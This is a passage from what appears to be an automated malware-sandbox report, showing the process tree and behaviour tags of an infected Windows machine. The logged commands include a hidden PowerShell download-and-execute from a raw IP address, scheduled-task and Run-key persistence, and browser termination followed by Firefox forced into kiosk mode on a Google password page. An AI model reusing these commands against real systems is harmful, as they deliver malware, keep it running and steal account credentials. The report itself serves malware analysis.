        Command and Scripting Interpreter: PowerShell
        
        PID:7980
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        
        PID:8776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8880
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        
        PID:1336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10324
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "sa7qVmaiZuz" /tr "mshta \"C:\Temp\t9qXwA02d.hta\"" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11556
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\t9qXwA02d.hta"
        6⤵
        
        PID:4644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7276
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        8⤵
        
        PID:6748
    - - C:\Users\Admin\AppData\Local\Temp\10369200101\4449d5fc38.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369200101\4449d5fc38.exe"
        5⤵
        
        PID:9792
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:10256
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:10288
    - - C:\Users\Admin\AppData\Local\Temp\10369210101\267a26521d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369210101\267a26521d.exe"
        5⤵
        
        PID:6936
    - - C:\Users\Admin\AppData\Local\Temp\10369220101\7db71f3d0e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369220101\7db71f3d0e.exe"
        5⤵
        
        PID:8492
    - - C:\Users\Admin\AppData\Local\Temp\10369230101\323e76a035.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369230101\323e76a035.exe"
        5⤵
        
        PID:10468
    - - C:\Users\Admin\AppData\Local\Temp\10369240101\6718368e88.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369240101\6718368e88.exe"
        5⤵
        
        PID:8048
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        6⤵
        Kills process with taskkill
        
        PID:5684
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        6⤵
        Kills process with taskkill
        
        PID:8340
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        6⤵
        Kills process with taskkill
        
        PID:8464
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        6⤵
        Kills process with taskkill
        
        PID:8100
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        6⤵
        Kills process with taskkill
        
        PID:10344
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        6⤵
        
        PID:5088
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:4500
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1928 -prefsLen 27099 -prefMapHandle 1932 -prefMapSize 270279 -ipcHandle 2132 -initialChannelId {c9605796-3e2c-4ca7-90f0-bd0d60049654} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        8⤵
        
        PID:9760
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2556 -prefsLen 27135 -prefMapHandle 2560 -prefMapSize 270279 -ipcHandle 2448 -initialChannelId {2a55b248-5e0f-4f46-b86f-5db3661dca7c} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        8⤵
        
        PID:8944
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3664 -prefsLen 25164 -prefMapHandle 3668 -prefMapSize 270279 -jsInitHandle 3672 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3680 -initialChannelId {4e659819-915e-4b14-b224-bf240c785fc9} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        8⤵
        
        PID:9700
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3704 -prefsLen 27276 -prefMapHandle 3804 -prefMapSize 270279 -ipcHandle 3932 -initialChannelId {f634767c-4578-4ca0-8f4f-7202fc26689d} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        8⤵
        
        PID:9812
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4464 -prefsLen 34775 -prefMapHandle 4468 -prefMapSize 270279 -jsInitHandle 4472 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4480 -initialChannelId {496f6622-436d-4432-b662-ad1db54e7f58} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        8⤵
        
        PID:11728
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5032 -prefsLen 35012 -prefMapHandle 5060 -prefMapSize 270279 -ipcHandle 5068 -initialChannelId {f9139822-62bb-4c14-8ac5-9436438e61be} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        8⤵
        
        PID:3648
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5292 -prefsLen 32900 -prefMapHandle 5296 -prefMapSize 270279 -jsInitHandle 5300 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5308 -initialChannelId {518b55f3-9b97-43a8-b383-c4a8c4f29377} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        8⤵
        
        PID:9564
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5324 -prefsLen 32900 -prefMapHandle 5328 -prefMapSize 270279 -jsInitHandle 5332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5344 -initialChannelId {37d62900-5908-4611-94e0-eab49383f660} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        8⤵
        
        PID:11772
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5292 -prefsLen 32952 -prefMapHandle 5472 -prefMapSize 270279 -jsInitHandle 5460 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5688 -initialChannelId {e9fbe587-aa02-435f-91f9-900d065a24f3} -parentPid 4500 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4500" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        8⤵
        
        PID:11852
    - - C:\Users\Admin\AppData\Local\Temp\10369250101\2b106ec27d.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369250101\2b106ec27d.exe"
        5⤵
        
        PID:5944
    - - C:\Users\Admin\AppData\Local\Temp\10369260101\520482059a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369260101\520482059a.exe"
        5⤵
        
        PID:8144
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369260101\520482059a.exe"
        6⤵
        
        PID:6388
    - - C:\Users\Admin\AppData\Local\Temp\10369270101\8402c5e917.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369270101\8402c5e917.exe"
        5⤵
        
        PID:2252
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369270101\8402c5e917.exe"
        6⤵
        
        PID:12860
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Y8961.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2Y8961.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:684
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"
  2⤵
  PID:1980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
1⤵
- Suspicious use of WriteProcessMemory
PID:2308
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\"
  2⤵
  PID:4500

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2796

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 664 -ip 664
1⤵
PID:4116

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3228 -ip 3228
1⤵
PID:2160

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3416

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:5248

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:3876

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:5752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4032

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:3544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe"
1⤵
PID:6968
- C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
  2⤵
  PID:12828
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
    3⤵
    PID:7248
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
      4⤵
      PID:6088
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
        5⤵
        
        PID:7456
      - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        6⤵
        
        PID:7564
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        7⤵
        
        PID:7616
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        8⤵
        
        PID:7708
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        9⤵
        
        PID:12964
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        10⤵
        
        PID:8204
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        11⤵
        
        PID:8572
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        12⤵
        
        PID:9352
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        13⤵
        
        PID:9764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        14⤵
        
        PID:9864
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        15⤵
        
        PID:9980
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        16⤵
        
        PID:10200
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        17⤵
        
        PID:10284
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        18⤵
        
        PID:10464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        19⤵
        
        PID:10604
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_update.exe
        20⤵
        
        PID:10744
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        21⤵
        
        PID:10860
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        22⤵
        
        PID:11136
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        23⤵
        
        PID:11288
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        24⤵
        
        PID:12412
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_update.exe
        25⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        26⤵
        
        PID:12648
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        27⤵
        
        PID:12776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        28⤵
        
        PID:12912
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
        29⤵
        
        PID:7388
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        30⤵
        
        PID:7764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        31⤵
        
        PID:7896
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        32⤵
        
        PID:7992
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        33⤵
        
        PID:8128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_service.exe
        34⤵
        
        PID:2996
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_update.exe
        35⤵
        
        PID:8224
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        36⤵
        
        PID:8472
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdaterw.exe
        37⤵
        
        PID:8600
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        38⤵
        
        PID:8696
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaplatform_service.exe"
        39⤵
        Modifies registry key
        
        PID:8784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaplatform_service.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe\"'"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe"
1⤵
PID:9652
- C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
  2⤵
  PID:10028
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
    3⤵
    PID:10096
  - - C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
      C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
      4⤵
      PID:10208
    - - C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        5⤵
        
        PID:6320
      - C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        6⤵
        
        PID:10392
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        7⤵
        
        PID:10524
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        8⤵
        
        PID:10640
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        9⤵
        
        PID:10776
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        10⤵
        
        PID:10892
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        11⤵
        
        PID:11168
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        12⤵
        
        PID:11796
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        13⤵
        
        PID:11984
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        14⤵
        
        PID:12248
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        15⤵
        
        PID:4624
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        16⤵
        
        PID:12316
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        17⤵
        
        PID:6764
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        18⤵
        
        PID:12716
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
        19⤵
        
        PID:12884
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        20⤵
        
        PID:13104
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        21⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        22⤵
        
        PID:4584
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice.exe
        23⤵
        
        PID:8108
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_platform.exe
        24⤵
        
        PID:13220
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform.exe
        25⤵
        
        PID:7092
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_service.exe
        26⤵
        
        PID:2816
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
        27⤵
        
        PID:7180
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        28⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        29⤵
        
        PID:7988
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        30⤵
        
        PID:8096
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_update.exe
        31⤵
        
        PID:8212
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntime.exe
        32⤵
        
        PID:8724
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        33⤵
        
        PID:9232
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javapluginw.exe
        34⤵
        
        PID:9424
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservicew.exe
        35⤵
        
        PID:9464
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatformw.exe
        36⤵
        
        PID:10092
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaupdater_platform.exe
        37⤵
        
        PID:10128
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        38⤵
        
        PID:6140
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupportw.exe
        39⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_service.exe
        40⤵
        
        PID:11496
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_update.exe
        41⤵
        
        PID:11768
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaservice_platform.exe
        42⤵
        
        PID:11844
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplugin.exe
        43⤵
        
        PID:12976
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_platform.exe
        44⤵
        
        PID:6560
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javasupport_service.exe
        45⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaruntimew.exe
        46⤵
        
        PID:6692
        
        C:\Users\Admin\AppData\Roaming\Oracle\javaplatform_service.exe
